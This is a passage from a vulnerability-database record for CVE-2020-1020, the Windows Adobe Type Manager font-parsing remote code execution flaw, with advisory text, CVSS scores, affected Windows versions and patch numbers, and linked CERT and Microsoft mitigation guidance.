Adobe Font Manager Library Remote Code Execution Vulnerability

2020-04-14T07:00:00

Description

A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.

{"id": "MS:CVE-2020-1020", "bulletinFamily": "microsoft", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nFor all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nThe update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.\n", "published": "2020-04-14T07:00:00", "modified": "2020-04-14T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-1020"], "immutableFields": [], "type": "mscve", "lastseen": "2022-10-26T18:28:10", "edition": 1, "viewCount": 11, "enchantments": {"backreferences": {"references": [{"idList": ["VU:354840"], "type": "cert"}, {"idList": ["MS:ADV200006"], "type": "mscve"}, {"idList": ["CISA:574A6E25827684C587359C37EF1D5132"], "type": "cisa"}, {"idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491"], "type": "avleonov"}, {"idList": ["CVE-2020-1020"], "type": "cve"}, {"idList": ["QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA"], "type": "qualysblog"}, {"idList": ["SMB_NT_MS20_APR_4550951.NASL", "SMB_NT_MS20_APR_4550929.NASL", "SMB_NT_MS20_APR_4549949.NASL", "SMB_NT_MS20_APR_4550917.NASL", "SMB_NT_MS20_APR_4550930.NASL", "SMB_NT_MS20_APR_4550927.NASL", "SMB_NT_MS20_APR_4550922.NASL", "SMB_NT_MS20_APR_4550964.NASL", "SMB_NT_MS20_APR_4550961.NASL", "SMB_NT_MS20_APR_4549951.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:B879E243998561911585BBD37B7F33E9", "THREATPOST:88098D30DA04E912B06C03B52556385C", "THREATPOST:D48D061BB27415A9A171838BA457EB0E", "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A"], "type": "threatpost"}, {"idList": ["THN:D8AAE3E21499FA77C4C1B73C1DDA01E1"], "type": "thn"}, {"idList": ["CPAI-2020-0197"], "type": "checkpoint_advisories"}, {"idList": ["6E95B9E1-979B-595D-A4F4-99125E6059E4"], "type": "githubexploit"}, {"idList": ["AKB:59EFDEC4-921E-411A-8743-CB603C4BC068"], "type": "attackerkb"}, {"idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8"], "type": "krebs"}, {"idList": ["OPENVAS:1361412562310816830", "OPENVAS:1361412562310816823", "OPENVAS:1361412562310816824", "OPENVAS:1361412562310816829", "OPENVAS:1361412562310816826", "OPENVAS:1361412562310816828", "OPENVAS:1361412562311220201020", "OPENVAS:1361412562310816827", "OPENVAS:1361412562310816825"], "type": "openvas"}, {"idList": ["KB4550964"], "type": "mskb"}, {"idList": ["GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3"], "type": "googleprojectzero"}, {"idList": ["KLA11744", "KLA11743"], "type": "kaspersky"}]}, "dependencies": {"references": [{"idList": ["VU:354840"], "type": "cert"}, {"idList": ["MS:ADV200006"], "type": "mscve"}, {"idList": ["AVLEONOV:6A714F9BC2BBE696D3586B2629169491"], "type": "avleonov"}, {"idList": ["QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA", "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"], "type": "qualysblog"}, {"idList": ["SMB_NT_MS20_APR_4550951.NASL", "SMB_NT_MS20_APR_4550929.NASL", "SMB_NT_MS20_APR_4549949.NASL", "SMB_NT_MS20_APR_4550917.NASL", "SMB_NT_MS20_APR_4550930.NASL", "SMB_NT_MS20_APR_4550927.NASL", "SMB_NT_MS20_APR_4550922.NASL", "SMB_NT_MS20_APR_4550964.NASL", "SMB_NT_MS20_APR_4550961.NASL", "SMB_NT_MS20_APR_4549951.NASL"], "type": "nessus"}, {"idList": ["CISA-KEV-CVE-2020-1020", "CISA-KEV-CVE-2020-0938"], "type": "cisa_kev"}, {"idList": ["THREATPOST:88098D30DA04E912B06C03B52556385C", "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A"], "type": "threatpost"}, {"idList": ["AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "AKB:D673396D-06D8-4D50-B1AD-97679B53A487"], "type": "attackerkb"}, {"idList": ["OPENVAS:1361412562310816830", "OPENVAS:1361412562310816823", "OPENVAS:1361412562310816824", "OPENVAS:1361412562310816829", "OPENVAS:1361412562310816826", "OPENVAS:1361412562310816828", "OPENVAS:1361412562310816827", "OPENVAS:1361412562310816825"], "type": "openvas"}, {"idList": ["THN:D8AAE3E21499FA77C4C1B73C1DDA01E1"], "type": "thn"}, {"idList": ["CPAI-2020-0197"], "type": "checkpoint_advisories"}, {"idList": ["43EBEC21-E951-555D-B83D-6CE834F5BF3C", "6E95B9E1-979B-595D-A4F4-99125E6059E4"], "type": "githubexploit"}, {"idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8"], "type": "krebs"}, {"idList": ["CVE-2020-0938", "CVE-2020-1020"], "type": "cve"}, {"idList": ["GOOGLEPROJECTZERO:7B21B608699A0775A3608934DB89577B", "GOOGLEPROJECTZERO:C4CBD27E9FA33882CD77C7DAC1496DD3"], "type": "googleprojectzero"}, {"idList": ["KLA11744", "KLA11743"], "type": "kaspersky"}]}, "exploitation": null, "score": {"value": 2.2, "vector": "NONE"}, "vulnersScore": 2.2}, "_state": {"dependencies": 1666809388, "score": 1666809538}, "_internal": {"score_hash": "4ee2107e28b8fe49e65c98c7b2c3d682"}, "kbList": ["KB4549949", "KB4550929", "KB4538461", "KB4540670", "KB4550964", "KB4541506", "KB4541509", "KB4540673", "KB4550922", "KB4540681", "KB4550961", "KB4540693", "KB4550965", "KB4550930", "KB4550917", "KB4541510", "KB4540689", "KB4540688", "KB4550951", "KB4550970", "KB4550957", "KB4549951", "KB4550927", "KB4550971"], "msrc": "", "mscve": "CVE-2020-1020", "msAffectedSoftware": [{"kb": "KB4550964", "kbSupersedence": "KB4540688", "msplatform": "", "name": "windows 7 for x64-based systems service pack 1", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550961", "kbSupersedence": "KB4541509", "msplatform": "", "name": "windows 8.1 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550964", "kbSupersedence": "KB4540688", "msplatform": "", "name": "windows server 2008 r2 for x64-based systems service pack 1 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550964", "kbSupersedence": "KB4540688", "msplatform": "", "name": "windows server 2008 r2 for x64-based systems service pack 1", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550970", "kbSupersedence": "", "msplatform": "", "name": "windows server 2012 r2 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550929", "kbSupersedence": "KB4540670", "msplatform": "", "name": "windows 10 version 1607 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550965", "kbSupersedence": "", "msplatform": "", "name": "windows server 2008 r2 for x64-based systems service pack 1", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows 10 version 1909 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550964", "kbSupersedence": "KB4540688", "msplatform": "", "name": "windows 7 for 32-bit systems service pack 1", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550951", "kbSupersedence": "KB4541506", "msplatform": "", "name": "windows server 2008 for 32-bit systems service pack 2", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549949", "kbSupersedence": "KB4538461", "msplatform": "", "name": "windows server 2019 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550957", "kbSupersedence": "", "msplatform": "", "name": "windows server 2008 for x64-based systems service pack 2 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550917", "kbSupersedence": "KB4541510", "msplatform": "", "name": "windows server 2012 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550961", "kbSupersedence": "KB4541509", "msplatform": "", "name": "windows server 2012 r2", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550957", "kbSupersedence": "", "msplatform": "", "name": "windows server 2008 for 32-bit systems service pack 2", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows 10 version 1909 for arm64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550957", "kbSupersedence": "", "msplatform": "", "name": "windows server 2008 for 32-bit systems service pack 2 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550927", "kbSupersedence": "KB4540681", "msplatform": "", "name": "windows 10 version 1709 for arm64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550970", "kbSupersedence": "", "msplatform": "", "name": "windows 8.1 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550961", "kbSupersedence": "KB4541509", "msplatform": "", "name": "windows server 2012 r2 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549949", "kbSupersedence": "KB4538461", "msplatform": "", "name": "windows 10 version 1809 for arm64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows server, version 1903 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550927", "kbSupersedence": "KB4540681", "msplatform": "", "name": "windows 10 version 1709 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550957", "kbSupersedence": "", "msplatform": "", "name": "windows server 2008 for x64-based systems service pack 2", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550971", "kbSupersedence": "", "msplatform": "", "name": "windows server 2012", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows 10 version 1903 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows 10 version 1903 for arm64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550970", "kbSupersedence": "", "msplatform": "", "name": "windows server 2012 r2", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550922", "kbSupersedence": "KB4540689", "msplatform": "", "name": "windows 10 version 1803 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550922", "kbSupersedence": "KB4540689", "msplatform": "", "name": "windows server, version 1803 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550951", "kbSupersedence": "KB4541506", "msplatform": "", "name": "windows server 2008 for x64-based systems service pack 2 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550929", "kbSupersedence": "KB4540670", "msplatform": "", "name": "windows server 2016", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows 10 version 1909 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550970", "kbSupersedence": "", "msplatform": "", "name": "windows 8.1 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550927", "kbSupersedence": "KB4540681", "msplatform": "", "name": "windows 10 version 1709 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550917", "kbSupersedence": "KB4541510", "msplatform": "", "name": "windows server 2012", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550951", "kbSupersedence": "KB4541506", "msplatform": "", "name": "windows server 2008 for x64-based systems service pack 2", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550922", "kbSupersedence": "KB4540689", "msplatform": "", "name": "windows 10 version 1803 for arm64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550922", "kbSupersedence": "KB4540689", "msplatform": "", "name": "windows 10 version 1803 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows 10 version 1903 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550965", "kbSupersedence": "", "msplatform": "", "name": "windows 7 for x64-based systems service pack 1", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550961", "kbSupersedence": "KB4541509", "msplatform": "", "name": "windows rt 8.1", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550965", "kbSupersedence": "", "msplatform": "", "name": "windows server 2008 r2 for x64-based systems service pack 1 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549949", "kbSupersedence": "KB4538461", "msplatform": "", "name": "windows 10 version 1809 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550930", "kbSupersedence": "KB4540693", "msplatform": "", "name": "windows 10 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549949", "kbSupersedence": "KB4538461", "msplatform": "", "name": "windows server 2019", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550965", "kbSupersedence": "", "msplatform": "", "name": "windows 7 for 32-bit systems service pack 1", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549949", "kbSupersedence": "KB4538461", "msplatform": "", "name": "windows 10 version 1809 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4549951", "kbSupersedence": "KB4540673", "msplatform": "", "name": "windows server, version 1909 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550961", "kbSupersedence": "KB4541509", "msplatform": "", "name": "windows 8.1 for x64-based systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550951", "kbSupersedence": "KB4541506", "msplatform": "", "name": "windows server 2008 for 32-bit systems service pack 2 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550930", "kbSupersedence": "KB4540693", "msplatform": "", "name": "windows 10 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550971", "kbSupersedence": "", "msplatform": "", "name": "windows server 2012 (server core installation)", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550929", "kbSupersedence": "KB4540670", "msplatform": "", "name": "windows 10 version 1607 for 32-bit systems", "operator": "lt", "version": "2020-Apr"}, {"kb": "KB4550929", "kbSupersedence": "KB4540670", "msplatform": "", "name": "windows server 2016 (server core installation)", "operator": "lt", "version": "2020-Apr"}], "vendorCvss": {"baseScore": "7.8", "temporalScore": "7.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}

{"githubexploit": [{"lastseen": "2022-08-17T05:54:29", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-10T06:23:59", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2022-06-03T11:27:26", "id": "43EBEC21-E951-555D-B83D-6CE834F5BF3C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:36:36", "description": "# CVE-2020-1020\nWi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-10T03:10:39", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2022-04-24T16:54:15", "id": "6E95B9E1-979B-595D-A4F4-99125E6059E4", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cert": [{"lastseen": "2021-09-28T17:50:22", "description": "### Overview\n\nMicrosoft Windows contains two vulnerabilities in the parsing of Adobe Type 1 fonts, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nAdobe Type Manager, which is provided by `atmfd.dll`, is a kernel module that is provided by Windows and provides support for OpenType fonts. Two vulnerabilities in the Microsoft Windows Adobe Type Manager library may allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system. This vulnerability affects all supported versions of Windows, as well as Windows 7. This vulnerability is being exploited in the wild. \n \n--- \n \n### Impact\n\nBy causing a Windows system to open a specially crafted document or view it in the Windows preview pane, an unauthenticated remote attacker may be able to execute arbitrary code with kernel privileges on a vulnerable system. Windows 10 based operating systems would execute the code with limited privileges, in an [AppContainer](<https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>) sandbox. \n \n--- \n \n### Solution\n\n**Apply an update**\n\nThis issue has been addressed in [Microsoft updates for CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>). Please also consider the following workarounds that are listed in [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>): \n \n--- \n \n**Rename ATMFD.DLL** \n \nThis mitigation appears to be to the most effective workaround for this vulnerability, as it blocks the vulnerable code from being used by Windows. Please see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. Because supported Windows 10 versions do not use ATMFD.DLL, this mitigation is not applicable on those platforms. \n \n**Disable the preview pane and details pane in Windows Explorer** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n**Disable the WebClient service** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n--- \n \n### Vendor Information\n\n354840\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Affected\n\nNotified: March 23, 2020 Updated: April 14, 2020 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9 | E:F/RL:W/RC:C \nEnvironmental | 9.0 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n * <https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-1020](<http://web.nvd.nist.gov/vuln/detail/CVE-2020-1020>) \n---|--- \n**Date Public:** | 2020-03-23 \n**Date First Published:** | 2020-03-23 \n**Date Last Updated: ** | 2020-04-14 18:00 UTC \n**Document Revision: ** | 26 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-23T00:00:00", "type": "cert", "title": "Microsoft Windows Type 1 font parsing remote code execution vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T18:00:00", "id": "VU:354840", "href": "https://www.kb.cert.org/vuls/id/354840", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:24", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability (CVE-2020-1020)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-0197", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2022-10-27T00:23:13", "description": "Microsoft has become aware of limited targeted Windows 7 based attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released. We appreciate the efforts of our industry partners and are complying with a 7-day timeline for disclosing information regarding these limited attacks.\n\nTwo remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nMicrosoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers. The operating system versions that are affected by this vulnerability are listed below. Please see the mitigation and workarounds for guidance on how to reduce the risk.\n\n**Please Note:** The threat is low for those systems running Windows 10 due to mitigations that were put in place with the first version released in 2015.\n\nPlease see the mitigation section for details. Microsoft is not aware of any attacks against the Windows 10 platform. The possibility of remote code execution is negligible and elevation of privilege is not possible. We do not recommend that IT administrators running Windows 10 implement the workarounds described below.\n\nMicrosoft recommends upgrading to the Windows 10 family of clients and servers.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-23T07:00:00", "type": "mscve", "title": "Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T07:00:00", "id": "MS:ADV200006", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200006", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-08-02T17:31:15", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-0938.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 2:27am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 